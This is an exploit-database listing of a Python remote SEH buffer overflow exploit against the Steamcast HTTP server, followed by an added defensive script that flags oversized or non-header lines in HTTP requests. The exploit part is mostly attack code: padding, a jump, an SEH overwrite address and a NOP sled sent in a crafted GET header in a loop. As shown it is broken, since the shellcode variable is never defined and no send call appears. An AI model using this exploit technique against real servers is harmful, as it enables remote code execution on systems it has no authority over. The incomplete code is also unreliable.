Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]

ID 1337DAY-ID-9426
Type zdt
Reporter His0k4
Modified 2009-04-13T00:00:00


Exploit for Windows platform in category remote exploits

#[*] Usage   : [victim_ip]
#[*] Bug     : Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]
#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln.
#[*] Tested on :    Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ),,
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p

#Note : The problem is that we need to find a DLL which is not compiled with GS. In my case I found idmmbc, which is a loaded DLL of Internet Download Manager, so try to find an unsafe DLL.

import sys, socket
import struct

host = sys.argv[1]
port = 8000

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub

exploit = "\x41"*1003 + "\xEB\x06\x90\x90" + "\xDB\x27\x02\x10" + "\x90"*20 + shellcode

while 1:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host, port))
	head =  "GET / HTTP/1.1\r\n"
	head += "Host: "+host+"\r\n"
	head += exploit+"\r\n"
	head += "\r\n\r\n"


# [2018-01-02]  #
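
The request built in the listing above carries a single header line of more than 1000 bytes with no "name: value" form. The following is an added detection example, not part of the original listing: it inspects a raw HTTP request head for that shape. The function name, the thresholds and the sample requests are assumptions constructed for illustration.

```python
# Added defensive example (not from the original listing).
# MAX_LINE and MAX_NONPRINT_RATIO are assumed thresholds; tune them to the
# traffic the protected server normally receives.
MAX_LINE = 512             # assumed upper bound for one header line, in bytes
MAX_NONPRINT_RATIO = 0.05  # assumed tolerated share of non-printable bytes


def inspect_request(raw: bytes):
    """Return (line_no, reason) findings for the head of one raw HTTP request."""
    findings = []
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    # Line 1 is the request line; header lines start at line 2.
    for no, line in enumerate(lines[1:], start=2):
        if not line:
            continue
        if len(line) > MAX_LINE:
            findings.append((no, "oversized header line (%d bytes)" % len(line)))
        name, sep, _ = line.partition(b":")
        # A header needs a non-empty, printable name followed by a colon.
        if not sep or not name or not all(33 <= c <= 126 for c in name):
            findings.append((no, "not a valid 'name: value' header"))
        nonprint = sum(1 for c in line if (c < 32 and c != 9) or c > 126)
        if nonprint / len(line) > MAX_NONPRINT_RATIO:
            findings.append((no, "binary data in header line"))
    return findings


# Constructed sample inputs (documentation address range, inert filler bytes).
BENIGN = b"GET / HTTP/1.1\r\nHost: 192.0.2.10:8000\r\nUser-Agent: test\r\n\r\n"
SUSPICIOUS = (
    b"GET / HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    + b"A" * 1100 + b"\xff" * 100   # one long line, no colon, trailing binary
    + b"\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, inspect_request(req))
```

The same checks can be run over requests reassembled by a reverse proxy or from a packet capture in front of the streaming server.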